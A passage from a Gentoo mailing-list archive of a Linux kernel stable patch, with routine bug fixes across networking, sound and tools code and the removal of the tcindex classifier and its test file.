+-			}
+-		}
+-		pr_debug("handle = %d\n", t->tcm_handle);
+-		if (r->res.class &&
+-		    nla_put_u32(skb, TCA_TCINDEX_CLASSID, r->res.classid))
+-			goto nla_put_failure;
+-
+-		if (tcf_exts_dump(skb, &r->exts) < 0)
+-			goto nla_put_failure;
+-		nla_nest_end(skb, nest);
+-
+-		if (tcf_exts_dump_stats(skb, &r->exts) < 0)
+-			goto nla_put_failure;
+-	}
+-
+-	return skb->len;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, nest);
+-	return -1;
+-}
+-
+-static void tcindex_bind_class(void *fh, u32 classid, unsigned long cl,
+-			       void *q, unsigned long base)
+-{
+-	struct tcindex_filter_result *r = fh;
+-
+-	tc_cls_bind_class(classid, cl, q, &r->res, base);
+-}
+-
+-static struct tcf_proto_ops cls_tcindex_ops __read_mostly = {
+-	.kind		=	"tcindex",
+-	.classify	=	tcindex_classify,
+-	.init		=	tcindex_init,
+-	.destroy	=	tcindex_destroy,
+-	.get		=	tcindex_get,
+-	.change		=	tcindex_change,
+-	.delete		=	tcindex_delete,
+-	.walk		=	tcindex_walk,
+-	.dump		=	tcindex_dump,
+-	.bind_class	=	tcindex_bind_class,
+-	.owner		=	THIS_MODULE,
+-};
+-
+-static int __init init_tcindex(void)
+-{
+-	return register_tcf_proto_ops(&cls_tcindex_ops);
+-}
+-
+-static void __exit exit_tcindex(void)
+-{
+-	unregister_tcf_proto_ops(&cls_tcindex_ops);
+-}
+-
+-module_init(init_tcindex)
+-module_exit(exit_tcindex)
+-MODULE_LICENSE("GPL");
+diff --git a/net/sctp/stream_sched_prio.c b/net/sctp/stream_sched_prio.c
+index 42d4800f263dd..4d4d9da331f4c 100644
+--- a/net/sctp/stream_sched_prio.c
++++ b/net/sctp/stream_sched_prio.c
+@@ -25,6 +25,18 @@
+ 
+ static void sctp_sched_prio_unsched_all(struct sctp_stream *stream);
+ 
++static struct sctp_stream_priorities *sctp_sched_prio_head_get(struct sctp_stream_priorities *p)
++{
++	p->users++;
++	return p;
++}
++
++static void sctp_sched_prio_head_put(struct sctp_stream_priorities *p)
++{
++	if (p && --p->users == 0)
++		kfree(p);
++}
++
+ static struct sctp_stream_priorities *sctp_sched_prio_new_head(
+ 			struct sctp_stream *stream, int prio, gfp_t gfp)
+ {
+@@ -38,6 +50,7 @@ static struct sctp_stream_priorities *sctp_sched_prio_new_head(
+ 	INIT_LIST_HEAD(&p->active);
+ 	p->next = NULL;
+ 	p->prio = prio;
++	p->users = 1;
+ 
+ 	return p;
+ }
+@@ -53,7 +66,7 @@ static struct sctp_stream_priorities *sctp_sched_prio_get_head(
+ 	 */
+ 	list_for_each_entry(p, &stream->prio_list, prio_sched) {
+ 		if (p->prio == prio)
+-			return p;
++			return sctp_sched_prio_head_get(p);
+ 		if (p->prio > prio)
+ 			break;
+ 	}
+@@ -70,7 +83,7 @@ static struct sctp_stream_priorities *sctp_sched_prio_get_head(
+ 			 */
+ 			break;
+ 		if (p->prio == prio)
+-			return p;
++			return sctp_sched_prio_head_get(p);
+ 	}
+ 
+ 	/* If not even there, allocate a new one. */
+@@ -154,32 +167,21 @@ static int sctp_sched_prio_set(struct sctp_stream *stream, __u16 sid,
+ 	struct sctp_stream_out_ext *soute = sout->ext;
+ 	struct sctp_stream_priorities *prio_head, *old;
+ 	bool reschedule = false;
+-	int i;
++
++	old = soute->prio_head;
++	if (old && old->prio == prio)
++		return 0;
+ 
+ 	prio_head = sctp_sched_prio_get_head(stream, prio, gfp);
+ 	if (!prio_head)
+ 		return -ENOMEM;
+ 
+ 	reschedule = sctp_sched_prio_unsched(soute);
+-	old = soute->prio_head;
+ 	soute->prio_head = prio_head;
+ 	if (reschedule)
+ 		sctp_sched_prio_sched(stream, soute);
+ 
+-	if (!old)
+-		/* Happens when we set the priority for the first time */
+-		return 0;
+-
+-	for (i = 0; i < stream->outcnt; i++) {
+-		soute = SCTP_SO(stream, i)->ext;
+-		if (soute && soute->prio_head == old)
+-			/* It's still in use, nothing else to do here. */
+-			return 0;
+-	}
+-
+-	/* No hits, we are good to free it. */
+-	kfree(old);
+-
++	sctp_sched_prio_head_put(old);
+ 	return 0;
+ }
+ 
+@@ -206,20 +208,8 @@ static int sctp_sched_prio_init_sid(struct sctp_stream *stream, __u16 sid,
+ 
+ static void sctp_sched_prio_free_sid(struct sctp_stream *stream, __u16 sid)
+ {
+-	struct sctp_stream_priorities *prio = SCTP_SO(stream, sid)->ext->prio_head;
+-	int i;
+-
+-	if (!prio)
+-		return;
+-
++	sctp_sched_prio_head_put(SCTP_SO(stream, sid)->ext->prio_head);
+ 	SCTP_SO(stream, sid)->ext->prio_head = NULL;
+-	for (i = 0; i < stream->outcnt; i++) {
+-		if (SCTP_SO(stream, i)->ext &&
+-		    SCTP_SO(stream, i)->ext->prio_head == prio)
+-			return;
+-	}
+-
+-	kfree(prio);
+ }
+ 
+ static void sctp_sched_prio_enqueue(struct sctp_outq *q,
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index a83d2b4275fa6..38dcd9b401027 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -941,7 +941,9 @@ int tls_sw_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ 			       MSG_CMSG_COMPAT))
+ 		return -EOPNOTSUPP;
+ 
+-	mutex_lock(&tls_ctx->tx_lock);
++	ret = mutex_lock_interruptible(&tls_ctx->tx_lock);
++	if (ret)
++		return ret;
+ 	lock_sock(sk);
+ 
+ 	if (unlikely(msg->msg_controllen)) {
+@@ -1275,7 +1277,9 @@ int tls_sw_sendpage(struct sock *sk, struct page *page,
+ 		      MSG_SENDPAGE_NOTLAST | MSG_SENDPAGE_NOPOLICY))
+ 		return -EOPNOTSUPP;
+ 
+-	mutex_lock(&tls_ctx->tx_lock);
++	ret = mutex_lock_interruptible(&tls_ctx->tx_lock);
++	if (ret)
++		return ret;
+ 	lock_sock(sk);
+ 	ret = tls_sw_do_sendpage(sk, page, offset, size, flags);
+ 	release_sock(sk);
+@@ -2416,11 +2420,19 @@ static void tx_work_handler(struct work_struct *work)
+ 
+ 	if (!test_and_clear_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask))
+ 		return;
+-	mutex_lock(&tls_ctx->tx_lock);
+-	lock_sock(sk);
+-	tls_tx_records(sk, -1);
+-	release_sock(sk);
+-	mutex_unlock(&tls_ctx->tx_lock);
++
++	if (mutex_trylock(&tls_ctx->tx_lock)) {
++		lock_sock(sk);
++		tls_tx_records(sk, -1);
++		release_sock(sk);
++		mutex_unlock(&tls_ctx->tx_lock);
++	} else if (!test_and_set_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask)) {
++		/* Someone is holding the tx_lock, they will likely run Tx
++		 * and cancel the work on their way out of the lock section.
++		 * Schedule a long delay just in case.
++		 */
++		schedule_delayed_work(&ctx->tx_work.work, msecs_to_jiffies(10));
++	}
+ }
+ 
+ static bool tls_is_tx_ready(struct tls_sw_context_tx *ctx)
+diff --git a/sound/soc/apple/mca.c b/sound/soc/apple/mca.c
+index 24381c42eb54c..64750db9b9639 100644
+--- a/sound/soc/apple/mca.c
++++ b/sound/soc/apple/mca.c
+@@ -101,7 +101,6 @@
+ #define SERDES_CONF_UNK3	BIT(14)
+ #define SERDES_CONF_NO_DATA_FEEDBACK	BIT(15)
+ #define SERDES_CONF_SYNC_SEL	GENMASK(18, 16)
+-#define SERDES_CONF_SOME_RST	BIT(19)
+ #define REG_TX_SERDES_BITSTART	0x08
+ #define REG_RX_SERDES_BITSTART	0x0c
+ #define REG_TX_SERDES_SLOTMASK	0x0c
+@@ -203,15 +202,24 @@ static void mca_fe_early_trigger(struct snd_pcm_substream *substream, int cmd,
+ 	case SNDRV_PCM_TRIGGER_START:
+ 	case SNDRV_PCM_TRIGGER_RESUME:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, 0));
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, 7));
+ 		mca_modify(cl, serdes_unit + REG_SERDES_STATUS,
+ 			   SERDES_STATUS_EN | SERDES_STATUS_RST,
+ 			   SERDES_STATUS_RST);
+-		mca_modify(cl, serdes_conf, SERDES_CONF_SOME_RST,
+-			   SERDES_CONF_SOME_RST);
+-		readl_relaxed(cl->base + serdes_conf);
+-		mca_modify(cl, serdes_conf, SERDES_STATUS_RST, 0);
+-		WARN_ON(readl_relaxed(cl->base + REG_SERDES_STATUS) &
++		/*
++		 * Experiments suggest that it takes at most ~1 us
++		 * for the bit to clear, so wait 2 us for good measure.
++		 */
++		udelay(2);
++		WARN_ON(readl_relaxed(cl->base + serdes_unit + REG_SERDES_STATUS) &
+ 			SERDES_STATUS_RST);
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, 0));
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, cl->no + 1));
+ 		break;
+ 	default:
+ 		break;
+@@ -942,10 +950,17 @@ static int mca_pcm_new(struct snd_soc_component *component,
+ 		chan = mca_request_dma_channel(cl, i);
+ 
+ 		if (IS_ERR_OR_NULL(chan)) {
++			mca_pcm_free(component, rtd->pcm);
++
++			if (chan && PTR_ERR(chan) == -EPROBE_DEFER)
++				return PTR_ERR(chan);
++
+ 			dev_err(component->dev, "unable to obtain DMA channel (stream %d cluster %d): %pe\n",
+ 				i, cl->no, chan);
+-			mca_pcm_free(component, rtd->pcm);
+-			return -EINVAL;
++
++			if (!chan)
++				return -EINVAL;
++			return PTR_ERR(chan);
+ 		}
+ 
+ 		cl->dma_chans[i] = chan;
+diff --git a/sound/soc/codecs/Kconfig b/sound/soc/codecs/Kconfig
+index 0f9d71490075f..ac2a2bfdaf37a 100644
+--- a/sound/soc/codecs/Kconfig
++++ b/sound/soc/codecs/Kconfig
+@@ -2045,6 +2045,7 @@ config SND_SOC_WSA883X
+ config SND_SOC_ZL38060
+ 	tristate "Microsemi ZL38060 Connected Home Audio Processor"
+ 	depends on SPI_MASTER
++	depends on GPIOLIB
+ 	select REGMAP
+ 	help
+ 	  Support for ZL38060 Connected Home Audio Processor from Microsemi,
+diff --git a/sound/soc/codecs/adau7118.c b/sound/soc/codecs/adau7118.c
+index bbb0972498876..a663d37e57760 100644
+--- a/sound/soc/codecs/adau7118.c
++++ b/sound/soc/codecs/adau7118.c
+@@ -444,22 +444,6 @@ static const struct snd_soc_component_driver adau7118_component_driver = {
+ 	.endianness		= 1,
+ };
+ 
+-static void adau7118_regulator_disable(void *data)
+-{
+-	struct adau7118_data *st = data;
+-	int ret;
+-	/*
+-	 * If we fail to disable DVDD, don't bother in trying IOVDD. We
+-	 * actually don't want to be left in the situation where DVDD
+-	 * is enabled and IOVDD is disabled.
+-	 */
+-	ret = regulator_disable(st->dvdd);
+-	if (ret)
+-		return;
+-
+-	regulator_disable(st->iovdd);
+-}
+-
+ static int adau7118_regulator_setup(struct adau7118_data *st)
+ {
+ 	st->iovdd = devm_regulator_get(st->dev, "iovdd");
+@@ -481,8 +465,7 @@ static int adau7118_regulator_setup(struct adau7118_data *st)
+ 		regcache_cache_only(st->map, true);
+ 	}
+ 
+-	return devm_add_action_or_reset(st->dev, adau7118_regulator_disable,
+-					st);
++	return 0;
+ }
+ 
+ static int adau7118_parset_dt(const struct adau7118_data *st)
+diff --git a/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c b/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c
+index c2e268054773d..f2c9a1fdbe0d0 100644
+--- a/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c
++++ b/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c
+@@ -2567,6 +2567,9 @@ static void mt8195_dai_etdm_parse_of(struct mtk_base_afe *afe)
+ 
+ 	/* etdm in only */
+ 	for (i = 0; i < 2; i++) {
++		dai_id = ETDM_TO_DAI_ID(i);
++		etdm_data = afe_priv->dai_priv[dai_id];
++
+ 		ret = snprintf(prop, sizeof(prop),
+ 			       "mediatek,%s-chn-disabled",
+ 			       of_afe_etdms[i].name);
+diff --git a/tools/iio/iio_utils.c b/tools/iio/iio_utils.c
+index 8d35893b2fa85..6a00a6eecaef0 100644
+--- a/tools/iio/iio_utils.c
++++ b/tools/iio/iio_utils.c
+@@ -264,6 +264,7 @@ int iioutils_get_param_float(float *output, const char *param_name,
+ 			if (fscanf(sysfsfp, "%f", output) != 1)
+ 				ret = errno ? -errno : -ENODATA;
+ 
++			fclose(sysfsfp);
+ 			break;
+ 		}
+ error_free_filename:
+@@ -345,9 +346,9 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			}
+ 
+ 			sysfsfp = fopen(filename, "r");
++			free(filename);
+ 			if (!sysfsfp) {
+ 				ret = -errno;
+-				free(filename);
+ 				goto error_close_dir;
+ 			}
+ 
+@@ -357,7 +358,6 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 				if (fclose(sysfsfp))
+ 					perror("build_channel_array(): Failed to close file");
+ 
+-				free(filename);
+ 				goto error_close_dir;
+ 			}
+ 			if (ret == 1)
+@@ -365,11 +365,9 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 
+ 			if (fclose(sysfsfp)) {
+ 				ret = -errno;
+-				free(filename);
+ 				goto error_close_dir;
+ 			}
+ 
+-			free(filename);
+ 		}
+ 
+ 	*ci_array = malloc(sizeof(**ci_array) * (*counter));
+@@ -395,9 +393,9 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			}
+ 
+ 			sysfsfp = fopen(filename, "r");
++			free(filename);
+ 			if (!sysfsfp) {
+ 				ret = -errno;
+-				free(filename);
+ 				count--;
+ 				goto error_cleanup_array;
+ 			}
+@@ -405,20 +403,17 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			errno = 0;
+ 			if (fscanf(sysfsfp, "%i", &current_enabled) != 1) {
+ 				ret = errno ? -errno : -ENODATA;
+-				free(filename);
+ 				count--;
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			if (fclose(sysfsfp)) {
+ 				ret = -errno;
+-				free(filename);
+ 				count--;
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			if (!current_enabled) {
+-				free(filename);
+ 				count--;
+ 				continue;
+ 			}
+@@ -429,7 +424,6 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 						strlen(ent->d_name) -
+ 						strlen("_en"));
+ 			if (!current->name) {
+-				free(filename);
+ 				ret = -ENOMEM;
+ 				count--;
+ 				goto error_cleanup_array;
+@@ -439,7 +433,6 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			ret = iioutils_break_up_name(current->name,
+ 						     &current->generic_name);
+ 			if (ret) {
+-				free(filename);
+ 				free(current->name);
+ 				count--;
+ 				goto error_cleanup_array;
+@@ -450,17 +443,16 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 				       scan_el_dir,
+ 				       current->name);
+ 			if (ret < 0) {
+-				free(filename);
+ 				ret = -ENOMEM;
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			sysfsfp = fopen(filename, "r");
++			free(filename);
+ 			if (!sysfsfp) {
+ 				ret = -errno;
+-				fprintf(stderr, "failed to open %s\n",
+-					filename);
+-				free(filename);
++				fprintf(stderr, "failed to open %s/%s_index\n",
++					scan_el_dir, current->name);
+ 				goto error_cleanup_array;
+ 			}
+ 
+@@ -470,17 +462,14 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 				if (fclose(sysfsfp))
+ 					perror("build_channel_array(): Failed to close file");
+ 
+-				free(filename);
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			if (fclose(sysfsfp)) {
+ 				ret = -errno;
+-				free(filename);
+ 				goto error_cleanup_array;
+ 			}
+ 
+-			free(filename);
+ 			/* Find the scale */
+ 			ret = iioutils_get_param_float(&current->scale,
+ 						       "scale",
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index b1a5f658673f0..ea1e7cdeb1b34 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -688,6 +688,7 @@ static int create_static_call_sections(struct objtool_file *file)
+ 		if (strncmp(key_name, STATIC_CALL_TRAMP_PREFIX_STR,
+ 			    STATIC_CALL_TRAMP_PREFIX_LEN)) {
+ 			WARN("static_call: trampoline name malformed: %s", key_name);
++			free(key_name);
+ 			return -1;
+ 		}
+ 		tmp = key_name + STATIC_CALL_TRAMP_PREFIX_LEN - STATIC_CALL_KEY_PREFIX_LEN;
+@@ -697,6 +698,7 @@ static int create_static_call_sections(struct objtool_file *file)
+ 		if (!key_sym) {
+ 			if (!opts.module) {
+ 				WARN("static_call: can't find static_call_key symbol: %s", tmp);
++				free(key_name);
+ 				return -1;
+ 			}
+ 
+diff --git a/tools/testing/selftests/netfilter/rpath.sh b/tools/testing/selftests/netfilter/rpath.sh
+index f7311e66d2193..5289c8447a419 100755
+--- a/tools/testing/selftests/netfilter/rpath.sh
++++ b/tools/testing/selftests/netfilter/rpath.sh
+@@ -62,10 +62,16 @@ ip -net "$ns1" a a fec0:42::2/64 dev v0 nodad
+ ip -net "$ns2" a a fec0:42::1/64 dev d0 nodad
+ 
+ # firewall matches to test
+-[ -n "$iptables" ] && ip netns exec "$ns2" \
+-	"$iptables" -t raw -A PREROUTING -s 192.168.0.0/16 -m rpfilter
+-[ -n "$ip6tables" ] && ip netns exec "$ns2" \
+-	"$ip6tables" -t raw -A PREROUTING -s fec0::/16 -m rpfilter
++[ -n "$iptables" ] && {
++	common='-t raw -A PREROUTING -s 192.168.0.0/16'
++	ip netns exec "$ns2" "$iptables" $common -m rpfilter
++	ip netns exec "$ns2" "$iptables" $common -m rpfilter --invert
++}
++[ -n "$ip6tables" ] && {
++	common='-t raw -A PREROUTING -s fec0::/16'
++	ip netns exec "$ns2" "$ip6tables" $common -m rpfilter
++	ip netns exec "$ns2" "$ip6tables" $common -m rpfilter --invert
++}
+ [ -n "$nft" ] && ip netns exec "$ns2" $nft -f - <<EOF
+ table inet t {
+ 	chain c {
+@@ -89,6 +95,11 @@ ipt_zero_rule() { # (command)
+ 	[ -n "$1" ] || return 0
+ 	ip netns exec "$ns2" "$1" -t raw -vS | grep -q -- "-m rpfilter -c 0 0"
+ }
++ipt_zero_reverse_rule() { # (command)
++	[ -n "$1" ] || return 0
++	ip netns exec "$ns2" "$1" -t raw -vS | \
++		grep -q -- "-m rpfilter --invert -c 0 0"
++}
+ nft_zero_rule() { # (family)
+ 	[ -n "$nft" ] || return 0
+ 	ip netns exec "$ns2" "$nft" list chain inet t c | \
+@@ -101,8 +112,7 @@ netns_ping() { # (netns, args...)
+ 	ip netns exec "$netns" ping -q -c 1 -W 1 "$@" >/dev/null
+ }
+ 
+-testrun() {
+-	# clear counters first
++clear_counters() {
+ 	[ -n "$iptables" ] && ip netns exec "$ns2" "$iptables" -t raw -Z
+ 	[ -n "$ip6tables" ] && ip netns exec "$ns2" "$ip6tables" -t raw -Z
+ 	if [ -n "$nft" ]; then
+@@ -111,6 +121,10 @@ testrun() {
+ 			ip netns exec "$ns2" $nft -s list table inet t;
+ 		) | ip netns exec "$ns2" $nft -f -
+ 	fi
++}
++
++testrun() {
++	clear_counters
+ 
+ 	# test 1: martian traffic should fail rpfilter matches
+ 	netns_ping "$ns1" -I v0 192.168.42.1 && \
+@@ -120,9 +134,13 @@ testrun() {
+ 
+ 	ipt_zero_rule "$iptables" || die "iptables matched martian"
+ 	ipt_zero_rule "$ip6tables" || die "ip6tables matched martian"
++	ipt_zero_reverse_rule "$iptables" && die "iptables not matched martian"
++	ipt_zero_reverse_rule "$ip6tables" && die "ip6tables not matched martian"
+ 	nft_zero_rule ip || die "nft IPv4 matched martian"
+ 	nft_zero_rule ip6 || die "nft IPv6 matched martian"
+ 
++	clear_counters
++
+ 	# test 2: rpfilter match should pass for regular traffic
+ 	netns_ping "$ns1" 192.168.23.1 || \
+ 		die "regular ping 192.168.23.1 failed"
+@@ -131,6 +149,8 @@ testrun() {
+ 
+ 	ipt_zero_rule "$iptables" && die "iptables match not effective"
+ 	ipt_zero_rule "$ip6tables" && die "ip6tables match not effective"
++	ipt_zero_reverse_rule "$iptables" || die "iptables match over-effective"
++	ipt_zero_reverse_rule "$ip6tables" || die "ip6tables match over-effective"
+ 	nft_zero_rule ip && die "nft IPv4 match not effective"
+ 	nft_zero_rule ip6 && die "nft IPv6 match not effective"
+ 
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/filters/tcindex.json b/tools/testing/selftests/tc-testing/tc-tests/filters/tcindex.json
+deleted file mode 100644
+index 44901db703764..0000000000000
+--- a/tools/testing/selftests/tc-testing/tc-tests/filters/tcindex.json
++++ /dev/null
+@@ -1,227 +0,0 @@
+-[
+-    {
+-        "id": "8293",
+-        "name": "Add tcindex filter with default action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref 1 tcindex chain 0 handle 0x0001 classid 1:1",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "7281",
+-        "name": "Add tcindex filter with hash size and pass action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 fall_through classid 1:1 action pass",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action pass",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "b294",
+-        "name": "Add tcindex filter with mask shift and reclassify action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 mask 1 shift 2 fall_through classid 1:1 action reclassify",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action reclassify",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "0532",
+-        "name": "Add tcindex filter with pass_on and continue actions",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 mask 1 shift 2 pass_on classid 1:1 action continue",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action continue",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "d473",
+-        "name": "Add tcindex filter with pipe action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 mask 1 shift 2 fall_through classid 1:1 action pipe",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action pipe",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "2940",
+-        "name": "Add tcindex filter with miltiple actions",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 7 tcindex hash 32 mask 1 shift 2 fall_through classid 1:1 action skbedit mark 7 pipe action gact drop",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 7 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref 7 tcindex.*handle 0x0001.*action.*skbedit.*mark 7 pipe.*action.*gact action drop",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "1893",
+-        "name": "List tcindex filters",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1",
+-            "$TC filter add dev $DEV1 parent ffff: handle 2 protocol ip prio 1 tcindex classid 1:1"
+-        ],
+-        "cmdUnderTest": "$TC filter show dev $DEV1 parent ffff:",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "handle 0x000[0-9]+ classid 1:1",
+-        "matchCount": "2",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "2041",
+-        "name": "Change tcindex filter with pass action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop"
+-        ],
+-        "cmdUnderTest": "$TC filter change dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action pass",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "handle 0x0001 classid 1:1.*action order [0-9]+: gact action pass",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "9203",
+-        "name": "Replace tcindex filter with pass action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop"
+-        ],
+-        "cmdUnderTest": "$TC filter replace dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action pass",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "handle 0x0001 classid 1:1.*action order [0-9]+: gact action pass",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "7957",
+-        "name": "Delete tcindex filter with drop action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop"
+-        ],
+-        "cmdUnderTest": "$TC filter del dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "handle 0x0001 classid 1:1.*action order [0-9]+: gact action drop",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    }
+-]


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-05-17 13:17 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-05-17 13:17 UTC (permalink / raw
  To: gentoo-commits

